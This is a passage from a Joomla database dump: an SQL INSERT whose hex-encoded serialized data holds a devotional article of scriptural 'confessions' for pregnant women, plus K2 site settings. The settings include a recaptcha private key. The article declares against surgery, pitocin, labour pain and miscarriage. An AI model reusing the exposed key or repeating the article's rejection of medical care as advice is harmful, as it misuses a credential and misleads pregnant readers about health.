56e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(178, 'index.php?option=com_k2&view=item&id=36', 'index.php?option=com_k2&view=item&id=36:scriptural-confession', 'Scriptural Confession for Pregnant Women', ' “Make these scriptures your daily confession at least 3 times daily- morning, afternoon and evening. It can be more! (You can even start before pregnancy).” Gen. 4:1 – “And Adam knew Eve his wife; and she conceived, and bears Cain, and said, I have gotte', '2017-04-02 08:50:54', 'e863ed849072b06fd6ee4b3170ede50a', 1, 1, 1, '*', '2017-03-23 16:38:57', '0000-00-00 00:00:00', '2017-03-23 16:38:57', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223336223b733a353a22616c696173223b733a32313a227363726970747572616c2d636f6e66657373696f6e223b733a373a2273756d6d617279223b733a3437363a223c703ee2809c4d616b65207468657365207363726970747572657320796f7572206461696c7920636f6e66657373696f6e206174206c6561737420332074696d6573206461696c792d206d6f726e696e672c2061667465726e6f6f6e20616e64206576656e696e672e2049742063616e206265206d6f7265212028596f752063616e206576656e207374617274206265666f726520707265676e616e6379292ee2809d3c2f703e0d0a3c703e47656e2e20343a3120e2809320e2809c416e64204164616d206b6e6577204576652068697320776966653b20616e642073686520636f6e6365697665642c20616e64206265617273204361696e2c20616e6420736169642c2049206861766520676f7474656e2061206d616e2066726f6d20746865204c6f72642ee2809d2047656e2e20343a31372c2047656e2e2031363a342c2047656e2e2032393a33322c2033332c2033342c2033353b2047656e2e2033303a352c20373b2047656e2e2033303a32333b2045782e323a32392e204920636f6e636569766520616e64204920626172652c206e6f206d6973636172726961676520696e204a65737573206e616d652e2045766572796f6e6520636f6e63656976656420616e6420626172652c20736f20646f20492e3c2f703e0d0a223b733a343a22626f6479223b733a363936323a220d0a3c703e47656e2e2032353a32342d20e2809c416e64207768656e20686572206461797320746f2062652064656c69766572656420776572652066756c66696c6c65642c206265686f6c642c2074686572652077657265207477696e7320696e2068657220776f6d622ee2809d204d79206461797320746f2062652064656c697665726564206172652066756c66696c6c656420696e204a65737573206e616d652e2046756c6c792d646576656c6f7065642d6261627920636f6d6573206f75742d62792068696d73656c662f68657273656c66206f7574206f66206d7920776f6d622e3c2f703e0d0a3c703e47656e2e2033353a313761202d20e2809c416e642069742063616d6520746f20706173732c207768656e207368652077617320696e2068617264206c61626f72e280a6e280a6e280a6e280a62e2ee2809d204920636f6d6520616761696e73742065766572792068617264206c61626f7220647572696e67206d792064656c69766572792e2049742077696c6c206265206561737920666f72206d6520696e204a65737573206e616d652e204d7920476f64206d616b657320646966666963756c74207468696e67732065617379213c2f703e0d0a3c703e47656e2e2033353a3237622d20c2a0e2809ce280a6e280a6e280a67468617420746865206d696477696665207361696420756e746f206865722c2046656172206e6f743b2074686f75207368616c742068617665207468697320736f6e20616c736f2ee2809d20492066656172206e6f742c20492068617665207468697320736f6e20616c736f2e204e6f207374696c6c20626972746820696e204a65737573206e616d652e3c2f703e0d0a3c703e45782e20313a31392de2809d416e6420746865206d69647769766573207361696420756e746f2050686172616f682c2062656361757365207468652048656272657720776f6d656e20617265206e6f742061732074686520456779707469616e20776f6d656e3b20666f72207468657920617265206c6976656c792c20616e64206172652064656c6976657265642065726520746865206d6964776976657320636f6d6520696e20756e746f207468656d2ee2809d204920616d20612048656272657720776f6d616e202847616c2e20333a3239292c204920616d206c6976656c793b204920616d206e6f7420616e20756e62656c69657665722c20776974686f757420476f642c20776974686f757420636f76656e616e742e20492064656c6976657220776974686f757420636f6d706c69636174696f6e7320696e204a65737573206e616d652e3c2f703e0d0a3c703e45782e20323a3262202de2809de280a6e280a6616e64207768656e20736865207361772068696d207468617420686520776173206120676f6f646c79206368696c642c20736865206869642068696d207468726565206d6f6e7468732ee2809d204d792062616279206973206120676f6f646c79206368696c642e2041206368696c64206f662064657374696e7920616e6420677265617420707572706f73652077686f20737572766976657320616e6420747269756d706820616761696e737420616c6c206f6464732e204d7920626162792067726f777320706572666563746c792e204e6f206465666f726d6974792e3c2f703e0d0a3c703e4973616961682035383a3820e2809320e2809c5468656e207368616c6c20746879206c6967687420627265616b20666f72746820617320746865206d6f726e696e672c20616e64207468696e65206865616c7468207368616c6c20737072696e6720666f727468207370656564696c793a20616e6420746879207269676874656f75736e657373207368616c6c20676f206265666f726520746865653b2074686520676c6f7279206f6620746865204c4f5244207368616c6c20626520746879207265776172642ee2809d204d79206865616c746820737072696e6720666f727468207370656564696c792e204920616d206e6f74207369636b2c204920616d206e6f74207765616b2c20492068617665206e6f207061696e732c204920616d206865616c74687920616e64207374726f6e67213c2f703e0d0a3c703e446575742e2032383a342c3131613b2034612d20e2809c426c6573736564207368616c6c20626520746865206672756974206f662074687920626f64792ce2809d203131612de2809d416e6420746865204c4f5244207368616c6c206d616b65207468656520706c656e74656f757320696e20676f6f64732c20696e20746865206672756974206f662074687920626f6479e280a6e280a6e280a62e2ee2809d20546865206672756974206f66206d7920626f647920697320626c65737365642e204d79206261627920697320656d706f776572656420746f20646f2077656c6c2e204e6f206d616c666f726d6174696f6e2e204e6f74207375626a65637420746f20616e792064656d6f6e6963206861726173736d656e742e3c2f703e0d0a3c703e5073616c6d203133393a31332d313920e2809320313320e2809c466f722074686f75206861737420706f73736573736564206d79207265696e733a2074686f75206861737420636f7665726564206d6520696e206d79206d6f74686572e280997320776f6d622ee2809d2031342e20e2809c492077696c6c2070726169736520746865653b20666f72204920616d206665617266756c6c7920616e6420776f6e64657266756c6c79206d6164653a206d617276656c6f7573206172652074687920776f726b733b20616e642074686174206d7920736f756c206b6e6f776574682072696768742077656c6c2ee2809d2031352e20e2809c4d79207375627374616e636520776173206e6f74206869642066726f6d20746865652c207768656e204920776173206d61646520696e207365637265742c20616e6420637572696f75736c792077726f7567687420696e20746865206c6f77657374207061727473206f66207468652065617274682ee2809d20c2a031362e20e2809c5468696e6520657965732064696420736565206d79207375627374616e63652c20796574206265696e6720756e706572666563743b20616e6420696e2074687920626f6f6b20616c6c206d79206d656d626572732077657265207772697474656e2c20776869636820696e20636f6e74696e75616e636520776572652066617368696f6e65642c207768656e2061732079657420746865726520776173206e6f6e65206f66207468656d2ee2809d2031372e20e2809c486f772070726563696f757320616c736f20617265207468792074686f756768747320756e746f206d652c204f20476f642120486f77206772656174206973207468652073756d206f66207468656d2120e2809c2031382ee2809c496620492073686f756c6420636f756e74207468656d2c207468657920617265206d6f726520696e206e756d626572207468616e207468652073616e643a207768656e2049206177616b652c204920616d207374696c6c207769746820746865652ee2809d20c2a031392ee2809c537572656c792074686f752077696c7420736c617920746865207769636b65642c204f20476f643a206465706172742066726f6d206d65207468657265666f72652c20796520626c6f6f6479206d656e2ee2809d2054686973206973206d792062616279e280997320657870657269656e63652c20666f726d656420627920476f6420696e206d7920776f6d622c206665617266756c6c7920616e6420776f6e64657266756c6c79206d6164652e3c2f703e0d0a3c703e47656e2e2033353a31372de2809d416e642069742063616d6520746f20706173732c207768656e207368652077617320696e2068617264206c61626f722c207468617420746865206d696477696665207361696420756e746f206865722c2046656172206e6f743b2074686f75207368616c6c2068617665207468697320736f6e20616c736f2ee2809d2049207265636569766520476f64e28099732068616e64732075706f6e20746865206d696477697665732c20646f63746f727320616e642065766572796f6e6520746861742077696c6c20617474656e6420746f206d65206265666f72652c20647572696e6720616e642061667465722064656c69766572792e20546865792077696c6c20646f207768617420697320726967687420696e206d79206361736520696e204a65737573206e616d652e3c2f703e0d0a3c703e47656e2e20333a31362d20e2809c556e746f2074686520776f6d616e20686520736169642c20492077696c6c2067726561746c79206d756c7469706c792074687920736f72726f7720616e642074687920636f6e63657074696f6e3b20696e20736f72726f772074686f75207368616c74206272696e6720666f727468206368696c6472656e3b20616e642074687920646573697265207368616c6c20626520746f207468792068757362616e642c20616e64206865207368616c6c2072756c65206f76657220746865652ee2809d3c2f703e0d0a3c703e47616c2e20333a313320e2809320e2809c43687269737420686174682072656465656d65642075732066726f6d20746865206375727365206f6620746865206c61772c206265696e67206d616465206120637572736520666f722075733a20666f72206974206973207772697474656e2c20637572736564206973206576657279206f6e6520746861742068616e67657468206f6e206120747265653ae2809d20436872697374206861732072656465656d6564206d652066726f6d20746865206375727365206f6620746865206c61772e204920616d2072656465656d65642066726f6d2074686520736f72726f77206f6620707265676e616e637920616e64206368696c6462697274682e20492072656a656374206561726c79206d6f726e696e67207369636b6e6573732c2072656a65637420626f6479206261636b207061696e732c20492072656a656374206f6564656d612c20492072656a656374206661696e74696e6720616e64206265696e672070616c652e20492072656a656374206c61626f72207061696e2e204920616d2072656465656d65642066726f6d206c61626f72207061696e20696e20436872697374204a65737573213c2f703e0d0a3c703e4973616961682036363a3720e2809320e2809c6265666f726520736865207472617661696c65642c207368652062726f7567687420666f7274683b206265666f726520686572207061696e2063616d652c20736865207761732064656c697665726564206f662061206d616e206368696c642e204920686176652073686f7274206c61626f757220706572696f642e20546865206c6f7264206375742073686f727420666f72206d6520696e204a65737573206e616d652ee2809d3c2f703e0d0a3c703e4973616961682036363a3820e2809320e2809c77686f206861746820686561726420737563682061207468696e673f2057686f2068617468207365656e2073756368207468696e67733f205368616c6c20746865206561727468206265206d61646520746f206272696e6720666f72746820696e206f6e65206461793f204f72207368616c6c2061206e6174696f6e20626520626f726e206174206f6e63653f20466f7220617320736f6f6e206173205a696f6e207472617661696c65642c207368652062726f7567687420666f72746820686572206368696c6472656e2ee2809d20492072656a6563742065766572792064656c61792061742064656c69766572792e2041732049207472617661696c2c2049206272696e6720666f72746820696e204a65737573206e616d652e3c2f703e0d0a3c703e4973616961682036363a3920e2809320e2809c7368616c6c2049206272696e6720746f207468652062697274682c20616e64206e6f7420636175736520746f206272696e6720666f7274683f20536169746820746865206c6f72643a207368616c6c204920636175736520746f206272696e6720666f7274682c20616e6420736875742074686520776f6d623f2053616974682074687920476f642e20e2809c204920636f6d6520746f2074686520626972746820616e642049206272696e6720666f7274682e204920686176652066756c6c2064696c6174696f6e2c206d7920776f6d62206f70656e7320766572792077656c6c2e204e6f2064656c617920696e204a65737573206e616d652e3c2f703e0d0a3c703e4973616961682036363a31312d20e2809c74686174207965206d6179207375636b2c20616e64206265207361746973666965642077697468207468652062726561737473206f662068657220636f6e736f6c6174696f6e732c2074686174207965206d6179206d696c6b206f75742c20616e642062652064656c696768746564207769746820746865206162756e64616e6365206f662068657220676c6f72792e20e2809c204d792062616279207375636b732077656c6c2c207361746973666965642077697468206d7920627265617374206d696c6b20696e204a657375732e3c2f703e0d0a3c703e47616c2e20313a31352d20e2809c627574207768656e20697420706c656173656420476f642c2077686f20736570617261746564206d652066726f6d206d79206d6f74686572e280997320776f6d622c20616e642063616c6c6564206d6520627920686973206772616365e2809d2049206465636c617265207468617420697420697320476f64207468617420736570617261746573206d7920626162792066726f6d206d7920776f6d6220e280932073656c662d6e6f726d616c2d64656c697665727920696e204a657375732e204e6f7420746865206b6e696665206f662073757267656f6e7321204e6f7420666f72636566756c20656a656374696f6e2077697468207069746f73696e2c206e6f74207468652076616375756d2070756d702e20497420697320746865206c6f726420616e64206865e280996c6c20646f2061206e656174206a6f6220696e204a65737573206e616d652ee2809d3c2f703e0d0a3c703e45782e2032333a32362d20e2809c7468657265207368616c6c206e6f7468696e67206361737420746865697220796f756e672c206e6f722062652062617272656e2c20696e20746879206c616e643a20746865206e756d626572206f6620746879206461797320492077696c6c2066756c66696c6c2e204c756b6520313a35373b204c6b2e20323a362ee2809d20492077696c6c206e6f742063617374206d7920796f756e67206265666f7265207468652074696d652e204e6f207072656d61747572652064656c69766572792c204920636172727920746865206261627920757020746f207465726d20696e204a65737573206e616d652e20546865206461797320617265206163636f6d706c69736865642e3c2f703e0d0a3c703e5073616c6d20313a332d20e2809c616e64206865207368616c6c206265206c696b652061207472656520706c616e7465642062792074686520726976657273206f662077617465722c2074686174206272696e6765746820666f7274682068697320667275697420696e2068697320736561736f6e3b20686973206c65616620616c736f207368616c6c206e6f74207769746865723b20616e642077686174736f6576657220686520646f657468207368616c6c2070726f737065722e20e2809c20492070726f7370657220696e206d7920707265676e616e637920616e642064656c697665727920616e642074686572656166746572204920646f2077656c6c2e3c2f703e0d0a3c703e5068696c2e20343a332d20e2809c492063616e20646f20616c6c207468696e6773207468726f7567682043687269737420776869636820737472656e677468656e657468206d652ee2809d20492063616e20646f20616c6c207468696e6773207468726f75676820436872697374207468617420737472656e677468656e73206d652e204920616d20737472656e677468656e656420626f746820696e2074686520696e6e657220616e64206f75746572206d616e2e3c2f703e0d0a3c703e4c756b6520313a343420e2809320e2809c666f722c206c6f2c20617320736f6f6e2061732074686520766f696365206f66207468792073616c75746174696f6e20736f756e64656420696e206d696e6520656172732c2062616265206c656170656420696e206d7920776f6d6220666f72206a6f792ee2809d204d79206261627920697320706879736963616c6c792061637469766520616e6420616c736f2066696c6c656420776974682074686520486f6c79205370697269742066726f6d2074686520776f6d622e3c2f703e0d0a3c703e5073616c6d203131333a3920e2809320e2809c6865206d616b657468207468652062617272656e20776f6d616e20746f206b65657020686f7573652c20616e6420746f2062652061206a6f7966756c206d6f74686572206f66206368696c6472656e2e2050726169736520796520746865206c6f72642ee2809d204920616d206a6f7966756c206d6f74686572206f66206368696c6472656e2e204920616d20616c69766520616e642077656c6c2c206d7920626162792028616e64206f74686572206368696c6472656e20492068617665292061726520616c69766520616e642077656c6c2ec2a03c2f703e0d0a3c703ec2a03c2f703e0d0a3c703ec2a03c2f703e0d0a3c703e434f4e434c5553494f4e3ac2a03c2f703e0d0a3c703ec2a04a6f7368756120313a3820e2809c5468697320626f6f6b206f6620746865206c6177207368616c6c206e6f7420646570617274206f7574206f6620746879206d6f7574683b206275742074686f75207368616c74206d65646974617465207468657265696e2064617920616e64206e696768742c20746861742074686f75206d6179657374206f62736572766520746f20646f206163636f7264696e6720746f20616c6c2074686174206973207772697474656e207468657265696e3a20666f72207468656e2074686f75207368616c74206d616b6520746879207761792070726f737065726f75732c20616e64207468656e2074686f75207368616c74206861766520676f6f6420737563636573732ee2809d3c2f703e0d0a3c703ec2a050726f7665726220343a32302d32322e203230206d7920736f6e2c20617474656e6420746f206d7920776f7264733b20696e636c696e65207468696e652065617220756e746f206d7920736179696e672e203231206c6574207468656d206e6f74206465706172742066726f6d207468696e6520657965733b206b656570207468656d20696e20746865206d69647374206f66207468696e652068656172742e20323220666f72207468657920617265206c69666520756e746f2074686f736520746861742066696e64207468656d2c20616e64206865616c746820746f20616c6c20746865697220666c6573682e3c2f703e0d0a3c703ec2a052454d41494e20424c455353454420494e204a455355532e20c2a03c2f703e0d0a3c703ec2a03c2f703e223b733a353a226361746964223b733a313a2236223b733a31303a22637265617465645f6279223b733a333a22323030223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30342d30322030383a35303a3531223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a226f72646572223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2230223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c